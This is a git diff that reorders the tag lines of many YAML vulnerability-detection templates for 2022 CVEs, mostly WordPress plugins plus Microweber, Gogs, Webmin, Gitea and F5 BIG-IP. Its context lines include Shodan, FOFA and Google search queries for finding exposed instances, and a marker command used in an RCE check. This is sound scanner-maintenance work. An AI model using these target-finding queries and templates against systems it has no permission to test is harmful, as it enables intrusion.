shodan-query: http.favicon.hash:780351152
- tags: cve,cve2022,microweber,xss,huntr
+ tags: cve2022,cve,microweber,xss,huntr
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml
index 644ce51ad0..3b890aaa36 100644
--- a/http/cves/2022/CVE-2022-0412.yaml
+++ b/http/cves/2022/CVE-2022-0412.yaml
@@ -29,7 +29,7 @@ info:
vendor: templateinvaders
product: ti_woocommerce_wishlist
framework: wordpress
- tags: sqli,ti-woocommerce-wishlist,wpscan,cve,cve2022,woocommerce,wordpress,wp-plugin,wp,templateinvaders
+ tags: cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml
index d8feb8c22d..4df1db73f0 100644
--- a/http/cves/2022/CVE-2022-0415.yaml
+++ b/http/cves/2022/CVE-2022-0415.yaml
@@ -26,7 +26,7 @@ info:
max-request: 6
vendor: gogs
product: gogs
- tags: rce,gogs,authenticated,huntr,cve,cve2022,intrusive
+ tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml
index 1aa3e42d11..960606169b 100644
--- a/http/cves/2022/CVE-2022-0422.yaml
+++ b/http/cves/2022/CVE-2022-0422.yaml
@@ -27,7 +27,7 @@ info:
vendor: videousermanuals
product: white_label_cms
framework: wordpress
- tags: cve,cve2022,wordpress,xss,wp-plugin,wpscan,videousermanuals
+ tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml
index 47283565d7..6cc0cde021 100644
--- a/http/cves/2022/CVE-2022-0432.yaml
+++ b/http/cves/2022/CVE-2022-0432.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: joinmastodon
product: mastodon
- tags: mastodon,prototype,huntr,cve,cve2022,joinmastodon
+ tags: cve,cve2022,mastodon,prototype,huntr,joinmastodon
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml
index 7384eb2b69..b7a54a2bfe 100644
--- a/http/cves/2022/CVE-2022-0437.yaml
+++ b/http/cves/2022/CVE-2022-0437.yaml
@@ -27,7 +27,7 @@ info:
vendor: karma_project
product: karma
framework: node.js
- tags: oss,huntr,cve,cve2022,karma,xss,karma_project,node.js
+ tags: cve2022,cve,oss,huntr,karma,xss,karma_project,node.js
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml
index 2119fd14bb..93f51cfd56 100644
--- a/http/cves/2022/CVE-2022-0441.yaml
+++ b/http/cves/2022/CVE-2022-0441.yaml
@@ -29,7 +29,7 @@ info:
vendor: stylemixthemes
product: masterstudy_lms
framework: wordpress
- tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes
+ tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes
variables:
username: "{{to_lower(rand_text_alphanumeric(6))}}"
password: "{{rand_text_alphanumeric(12)}}"
diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml
index 18c28cdf3a..221ce1131c 100644
--- a/http/cves/2022/CVE-2022-0535.yaml
+++ b/http/cves/2022/CVE-2022-0535.yaml
@@ -30,7 +30,7 @@ info:
vendor: e2pdf
product: e2pdf
framework: wordpress
- tags: cve2022,wp-plugin,xss,authenticated,e2pdf,wpscan,cve,wordpress,wp
+ tags: cve,cve2022,wp-plugin,xss,authenticated,e2pdf,wpscan,wordpress,wp
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml
index a213516107..42c9cf172d 100644
--- a/http/cves/2022/CVE-2022-0591.yaml
+++ b/http/cves/2022/CVE-2022-0591.yaml
@@ -28,7 +28,7 @@ info:
product: formcraft3
framework: wordpress
fofa-query: body="formcraft3" && body="wp-"
- tags: wp,wp-plugin,wordpress,cve,formcraft3,wpscan,ssrf,cve2022,unauth,subtlewebinc
+ tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml
index 96f9ac4c16..c7b326edae 100644
--- a/http/cves/2022/CVE-2022-0597.yaml
+++ b/http/cves/2022/CVE-2022-0597.yaml
@@ -25,7 +25,7 @@ info:
vendor: microweber
product: microweber
shodan-query: http.favicon.hash:780351152
- tags: huntr,cve,cve2023,microweber,redirect,oss,
+ tags: cve,cve2022,huntr,microweber,redirect,oss
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml
index 8ea2e67097..2924636617 100644
--- a/http/cves/2022/CVE-2022-0656.yaml
+++ b/http/cves/2022/CVE-2022-0656.yaml
@@ -26,7 +26,7 @@ info:
vendor: webtoprint
product: web_to_print_shop\
google-query: inurl:"/wp-content/plugins/udraw"
- tags: wp,wordpress,wp-plugin,unauth,cve,cve2022,lfi,udraw,wpscan,webtoprint
+ tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml
index 7e32f5cd53..eeb2d95357 100644
--- a/http/cves/2022/CVE-2022-0660.yaml
+++ b/http/cves/2022/CVE-2022-0660.yaml
@@ -29,7 +29,7 @@ info:
max-request: 2
vendor: microweber
product: microweber
- tags: cve2022,microweber,disclosure,authenticated,huntr,cve
+ tags: cve,cve2022,microweber,disclosure,authenticated,huntr
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml
index c3926f191d..d98409dfa5 100644
--- a/http/cves/2022/CVE-2022-0678.yaml
+++ b/http/cves/2022/CVE-2022-0678.yaml
@@ -30,7 +30,7 @@ info:
vendor: microweber
product: microweber
shodan-query: http.favicon.hash:780351152
- tags: huntr,cve,cve2022,xss,microweber
+ tags: cve,cve2022,huntr,xss,microweber
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml
index a78f690b94..5551a49967 100644
--- a/http/cves/2022/CVE-2022-0679.yaml
+++ b/http/cves/2022/CVE-2022-0679.yaml
@@ -27,7 +27,7 @@ info:
vendor: narnoo_distributor_project
product: narnoo_distributor
framework: wordpress
- tags: narnoo-distributor,cve,cve2022,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi,narnoo_distributor_project
+ tags: cve,cve2022,narnoo-distributor,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi,narnoo_distributor_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml
index 38c2e5898d..d37f134902 100644
--- a/http/cves/2022/CVE-2022-0692.yaml
+++ b/http/cves/2022/CVE-2022-0692.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: alltube_project
product: alltube
- tags: huntr,cve,cve2022,redirect,rudloff,alltube,alltube_project
+ tags: cve,cve2022,huntr,redirect,rudloff,alltube,alltube_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml
index 3d254ebd82..4785d955ed 100644
--- a/http/cves/2022/CVE-2022-0693.yaml
+++ b/http/cves/2022/CVE-2022-0693.yaml
@@ -28,7 +28,7 @@ info:
vendor: devbunch
product: master_elements
framework: wordpress
- tags: unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,cve,cve2022,devbunch
+ tags: cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml
index 8d8c16f581..606000a24e 100644
--- a/http/cves/2022/CVE-2022-0769.yaml
+++ b/http/cves/2022/CVE-2022-0769.yaml
@@ -28,7 +28,7 @@ info:
vendor: usersultra
product: users_ultra
framework: wordpress
- tags: wp,users-ultra,wpscan,cve,cve2022,sqli,wordpress,wp-plugin,usersultra
+ tags: cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml
index 15cfea75fa..ffea19230f 100644
--- a/http/cves/2022/CVE-2022-0773.yaml
+++ b/http/cves/2022/CVE-2022-0773.yaml
@@ -28,7 +28,7 @@ info:
vendor: documentor_project
product: documentor
framework: wordpress
- tags: unauth,cve2022,sqli,wp-plugin,wp,documentor-lite,wpscan,cve,wordpress,documentor_project
+ tags: cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml
index 42ee55bdcc..60db432a2c 100644
--- a/http/cves/2022/CVE-2022-0776.yaml
+++ b/http/cves/2022/CVE-2022-0776.yaml
@@ -27,7 +27,7 @@ info:
vendor: revealjs
product: reveal.js
framework: node.js
- tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs,node.js
+ tags: cve,cve2022,hackerone,huntr,headless,postmessage,revealjs,node.js
headless:
- steps:
- args:
diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml
index cd56b781f0..1b8950c1c1 100644
--- a/http/cves/2022/CVE-2022-0781.yaml
+++ b/http/cves/2022/CVE-2022-0781.yaml
@@ -28,7 +28,7 @@ info:
vendor: nirweb
product: nirweb_support
framework: wordpress
- tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,nirweb-support,unauth,nirweb
+ tags: cve2022,cve,wordpress,wp-plugin,wp,sqli,wpscan,nirweb-support,unauth,nirweb
variables:
num: "999999999"
diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml
index 9dbff39222..8594628592 100644
--- a/http/cves/2022/CVE-2022-0784.yaml
+++ b/http/cves/2022/CVE-2022-0784.yaml
@@ -28,7 +28,7 @@ info:
vendor: title_experiments_free_project
product: title_experiments_free
framework: wordpress
- tags: cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,cve2022,wordpress,title_experiments_free_project
+ tags: cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml
index 6570a0c492..63390efa9d 100644
--- a/http/cves/2022/CVE-2022-0785.yaml
+++ b/http/cves/2022/CVE-2022-0785.yaml
@@ -28,7 +28,7 @@ info:
vendor: daily_prayer_time_project
product: daily_prayer_time
framework: wordpress
- tags: sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,cve,cve2022,wp,daily_prayer_time_project
+ tags: cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml
index 307281cf83..6414c37ae6 100644
--- a/http/cves/2022/CVE-2022-0786.yaml
+++ b/http/cves/2022/CVE-2022-0786.yaml
@@ -28,7 +28,7 @@ info:
vendor: iqonic
product: kivicare
framework: wordpress
- tags: sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,cve,cve2022,wpscan,iqonic
+ tags: cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml
index 8cb116a61a..6ca50626f6 100644
--- a/http/cves/2022/CVE-2022-0787.yaml
+++ b/http/cves/2022/CVE-2022-0787.yaml
@@ -25,7 +25,7 @@ info:
vendor: limit_login_attempts_project
product: limit_login_attempts
framework: wordpress
- tags: wpscan,cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project
+ tags: cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml
index e80c56e8d4..a8cba8ff06 100644
--- a/http/cves/2022/CVE-2022-0788.yaml
+++ b/http/cves/2022/CVE-2022-0788.yaml
@@ -28,7 +28,7 @@ info:
vendor: wpmet
product: wp_fundraising_donation_and_crowdfunding_platform
framework: wordpress
- tags: cve,sqli,wordpress,wp-plugin,cve2022,wp,wp-fundraising-donation,unauth,wpscan,wpmet
+ tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml
index a4dc0b6481..082c8fb54b 100644
--- a/http/cves/2022/CVE-2022-0817.yaml
+++ b/http/cves/2022/CVE-2022-0817.yaml
@@ -28,7 +28,7 @@ info:
vendor: badgeos
product: badgeos
framework: wordpress
- tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress
+ tags: cve,cve2022,wp,unauth,sqli,wp-plugin,badgeos,wpscan,wordpress
variables:
num: "999999999"
diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml
index 70201b2b5f..76c53d156c 100644
--- a/http/cves/2022/CVE-2022-0824.yaml
+++ b/http/cves/2022/CVE-2022-0824.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: webmin
product: webmin
- tags: rce,oss,huntr,cve,cve2022,webmin,authenticated
+ tags: cve,cve2022,rce,oss,huntr,webmin,authenticated
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml
index 2a0df91e2d..5ff60d8df1 100644
--- a/http/cves/2022/CVE-2022-0826.yaml
+++ b/http/cves/2022/CVE-2022-0826.yaml
@@ -28,7 +28,7 @@ info:
vendor: wp-video-gallery-free_project
product: wp-video-gallery-free
framework: wordpress
- tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project
+ tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml
index 3c7c205745..3c41679943 100644
--- a/http/cves/2022/CVE-2022-0846.yaml
+++ b/http/cves/2022/CVE-2022-0846.yaml
@@ -27,7 +27,7 @@ info:
vendor: speakout\!_email_petitions_project
product: speakout\!_email_petitions
framework: wordpress
- tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2022,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project
+ tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml
index 8030bd1dde..433fba1da3 100644
--- a/http/cves/2022/CVE-2022-0864.yaml
+++ b/http/cves/2022/CVE-2022-0864.yaml
@@ -28,7 +28,7 @@ info:
vendor: 'updraftplus'
product: 'updraftplus'
framework: wordpress
- tags: cve2022,xss,authenticated,updraftplus,wpscan,cve,wp-plugin,wp,wordpress,'updraftplus'
+ tags: cve,cve2022,xss,authenticated,updraftplus,wpscan,wp-plugin,wp,wordpress,'updraftplus'
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml
index 7754c54fe4..f270d4aa31 100644
--- a/http/cves/2022/CVE-2022-0867.yaml
+++ b/http/cves/2022/CVE-2022-0867.yaml
@@ -28,7 +28,7 @@ info:
vendor: reputeinfosystems
product: pricing_table
framework: wordpress
- tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve,reputeinfosystems
+ tags: cve,cve2022,unauth,wp,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,reputeinfosystems
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml
index 3e792a44c7..7f4f0ca24d 100644
--- a/http/cves/2022/CVE-2022-0869.yaml
+++ b/http/cves/2022/CVE-2022-0869.yaml
@@ -26,7 +26,7 @@ info:
max-request: 4
vendor: spirit-project
product: spirit
- tags: huntr,cve,cve2022,redirect,nitely,spirit,spirit-project
+ tags: cve,cve2022,huntr,redirect,nitely,spirit,spirit-project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml
index b2967ecc89..244ec2fdf4 100644
--- a/http/cves/2022/CVE-2022-0885.yaml
+++ b/http/cves/2022/CVE-2022-0885.yaml
@@ -28,7 +28,7 @@ info:
vendor: memberhero
product: member_hero
framework: wordpress
- tags: unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,cve,cve2022,memberhero
+ tags: cve,cve2022,unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,memberhero
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml
index 99cc2b25f4..307ffac18c 100644
--- a/http/cves/2022/CVE-2022-0899.yaml
+++ b/http/cves/2022/CVE-2022-0899.yaml
@@ -23,7 +23,7 @@ info:
vendor: draftpress
product: header_footer_code_manager
framework: wordpress
- tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,xss,authenticated,draftpress
+ tags: cve2022,cve,wpscan,wp,wp-plugin,wordpress,xss,authenticated,draftpress
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml
index 889dc179bf..e18ae8e998 100644
--- a/http/cves/2022/CVE-2022-0928.yaml
+++ b/http/cves/2022/CVE-2022-0928.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: microweber
product: microweber
- tags: cve,cve2022,authenticated,huntr,xss,microweber,cms
+ tags: cve2022,cve,authenticated,huntr,xss,microweber,cms
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml
index 8b30d5add2..5a7dd0336c 100644
--- a/http/cves/2022/CVE-2022-0948.yaml
+++ b/http/cves/2022/CVE-2022-0948.yaml
@@ -29,7 +29,7 @@ info:
vendor: pluginbazaar
product: order_listener_for_woocommerce
framework: wordpress
- tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin,pluginbazaar
+ tags: cve,cve2022,wp,unauth,sqli,woc-order-alert,wpscan,wordpress,wp-plugin,pluginbazaar
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml
index 7bbca60583..de47810ecb 100644
--- a/http/cves/2022/CVE-2022-0949.yaml
+++ b/http/cves/2022/CVE-2022-0949.yaml
@@ -27,7 +27,7 @@ info:
vendor: stopbadbots
product: block_and_stop_bad_bots
framework: wordpress
- tags: cve,stopbadbots,wp-plugin,wp,unauth,wpscan,cve2022,sqli,wordpress
+ tags: cve,cve2022,stopbadbots,wp-plugin,wp,unauth,wpscan,sqli,wordpress
variables:
IP: '{{rand_ip("1.1.1.0/24")}}'
diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml
index 85db4303b8..1a8118aa07 100644
--- a/http/cves/2022/CVE-2022-0952.yaml
+++ b/http/cves/2022/CVE-2022-0952.yaml
@@ -27,7 +27,7 @@ info:
vendor: sitemap_project
product: sitemap
framework: wordpress
- tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress,sitemap_project
+ tags: cve,cve2022,wp,wp-plugin,sitemap,wpscan,wordpress,sitemap_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml
index 97a5b5ba91..e193af386d 100644
--- a/http/cves/2022/CVE-2022-0954.yaml
+++ b/http/cves/2022/CVE-2022-0954.yaml
@@ -28,7 +28,7 @@ info:
max-request: 3
vendor: microweber
product: microweber
- tags: cve,cve2022,xss,microweber,huntr
+ tags: cve2022,cve,xss,microweber,huntr
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml
index 0749d95257..e43f3054eb 100644
--- a/http/cves/2022/CVE-2022-0963.yaml
+++ b/http/cves/2022/CVE-2022-0963.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: microweber
product: microweber
- tags: xss,microweber,cms,authenticated,huntr,cve,cve2022,intrusive
+ tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml
index fda6ef806a..8dcd6a9069 100644
--- a/http/cves/2022/CVE-2022-1007.yaml
+++ b/http/cves/2022/CVE-2022-1007.yaml
@@ -29,7 +29,7 @@ info:
vendor: elbtide
product: advanced_booking_calendar
framework: wordpress
- tags: wp-plugin,advanced-booking-calendar,cve,cve2022,wp,authenticated,wpscan,wordpress,xss,elbtide
+ tags: cve,cve2022,wp-plugin,advanced-booking-calendar,wp,authenticated,wpscan,wordpress,xss,elbtide
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml
index 9af377290f..c70f173ff7 100644
--- a/http/cves/2022/CVE-2022-1013.yaml
+++ b/http/cves/2022/CVE-2022-1013.yaml
@@ -27,7 +27,7 @@ info:
vendor: ays-pro
product: personal_dictionary
framework: wordpress
- tags: wp,unauth,wpscan,cve,cve2022,sqli,wordpress,wp-plugin,personal-dictionary,ays-pro
+ tags: cve,cve2022,wp,unauth,wpscan,sqli,wordpress,wp-plugin,personal-dictionary,ays-pro
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml
index 51e263df3e..381b694f2d 100644
--- a/http/cves/2022/CVE-2022-1020.yaml
+++ b/http/cves/2022/CVE-2022-1020.yaml
@@ -25,7 +25,7 @@ info:
vendor: codeastrology
product: woo_product_table
framework: wordpress
- tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth,codeastrology
+ tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml
index c808eea68e..00bf3d1b98 100644
--- a/http/cves/2022/CVE-2022-1054.yaml
+++ b/http/cves/2022/CVE-2022-1054.yaml
@@ -24,7 +24,7 @@ info:
vendor: wpchill
product: rsvp_and_event_management
framework: wordpress
- tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin,wpchill
+ tags: cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml
index a529436980..a7893eaf0c 100644
--- a/http/cves/2022/CVE-2022-1058.yaml
+++ b/http/cves/2022/CVE-2022-1058.yaml
@@ -28,7 +28,7 @@ info:
vendor: gitea
product: gitea
shodan-query: title:"Gitea"
- tags: huntr,cve,cve2022,open-redirect,gitea
+ tags: cve,cve2022,huntr,open-redirect,gitea
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml
index 542c49c89d..fc27ab689b 100644
--- a/http/cves/2022/CVE-2022-1119.yaml
+++ b/http/cves/2022/CVE-2022-1119.yaml
@@ -29,7 +29,7 @@ info:
vendor: simplefilelist
product: simple-file-list
framework: wordpress
- tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress,simplefilelist
+ tags: cve,cve2022,wp,wp-plugin,wpscan,lfi,wordpress,simplefilelist
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1168.yaml b/http/cves/2022/CVE-2022-1168.yaml
index ca221f213e..f2d8683eef 100644
--- a/http/cves/2022/CVE-2022-1168.yaml
+++ b/http/cves/2022/CVE-2022-1168.yaml
@@ -27,7 +27,7 @@ info:
product: jobsearch_wp_job_board
framework: wordpress
google-query: inurl:"wp-content/plugins/wp-jobsearch"
- tags: wp-jobsearch",wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
+ tags: cve,cve2022,wp-jobsearch",wpscan,wp-plugin,wp,wordpress,xss,eyecix
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1170.yaml b/http/cves/2022/CVE-2022-1170.yaml
index 4cb0c2fcf3..cd82f2e136 100644
--- a/http/cves/2022/CVE-2022-1170.yaml
+++ b/http/cves/2022/CVE-2022-1170.yaml
@@ -25,7 +25,7 @@ info:
product: jobmonster
framework: wordpress
publicwww-query: "/wp-content/themes/noo-jobmonster"
- tags: wpscan,cve,cve2022,wp,wp-theme,wordpress,xss,jobmonster,nootheme
+ tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml
index ed2d5da606..ca4ef34c94 100644
--- a/http/cves/2022/CVE-2022-1221.yaml
+++ b/http/cves/2022/CVE-2022-1221.yaml
@@ -28,7 +28,7 @@ info:
vendor: gwyn\'s_imagemap_selector_project
product: gwyn\'s_imagemap_selector
framework: wordpress
- tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve,gwyn\'s_imagemap_selector_project
+ tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml
index 38bb797286..0bc01bbae5 100644
--- a/http/cves/2022/CVE-2022-1329.yaml
+++ b/http/cves/2022/CVE-2022-1329.yaml
@@ -28,7 +28,7 @@ info:
vendor: elementor
product: website_builder
framework: wordpress
- tags: cve,cve2022,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload
+ tags: cve2022,cve,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml
index cb020cf53e..a0795dd4e7 100644
--- a/http/cves/2022/CVE-2022-1386.yaml
+++ b/http/cves/2022/CVE-2022-1386.yaml
@@ -28,7 +28,7 @@ info:
vendor: theme-fusion
product: avada
framework: wordpress
- tags: wpscan,cve,cve2022,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion
+ tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml
index a025dc9cc5..290231d44e 100644
--- a/http/cves/2022/CVE-2022-1388.yaml
+++ b/http/cves/2022/CVE-2022-1388.yaml
@@ -30,7 +30,7 @@ info:
vendor: f5
product: big-ip_access_policy_manager
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
- tags: f5,bigip,cve,cve2022,rce,mirai,kev
+ tags: cve,cve2022,f5,bigip,rce,mirai,kev
variables:
auth: "admin:"
cmd: "echo CVE-2022-1388 | rev"
diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml
index c34c377397..a4345e24e0 100644
--- a/http/cves/2022/CVE-2022-1390.yaml
+++ b/http/cves/2022/CVE-2022-1390.yaml
@@ -28,7 +28,7 @@ info:
vendor: admin_word_count_column_project
product: admin_word_count_column
framework: wordpress
- tags: packetstorm,wpscan,cve,cve2022,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project
+ tags: cve,cve2022,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml
index b40ec357ff..1e4328426f 100644
--- a/http/cves/2022/CVE-2022-1391.yaml
+++ b/http/cves/2022/CVE-2022-1391.yaml
@@ -28,7 +28,7 @@ info:
vendor: kanev
product: cab_fare_calculator
framework: wordpress
- tags: cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,cve,kanev
+ tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml
index 41229910c4..993e6d0f99 100644
--- a/http/cves/2022/CVE-2022-1392.yaml
+++ b/http/cves/2022/CVE-2022-1392.yaml
@@ -27,7 +27,7 @@ info:
vendor: commoninja
product: videos_sync_pdf
framework: wordpress
- tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress,commoninja
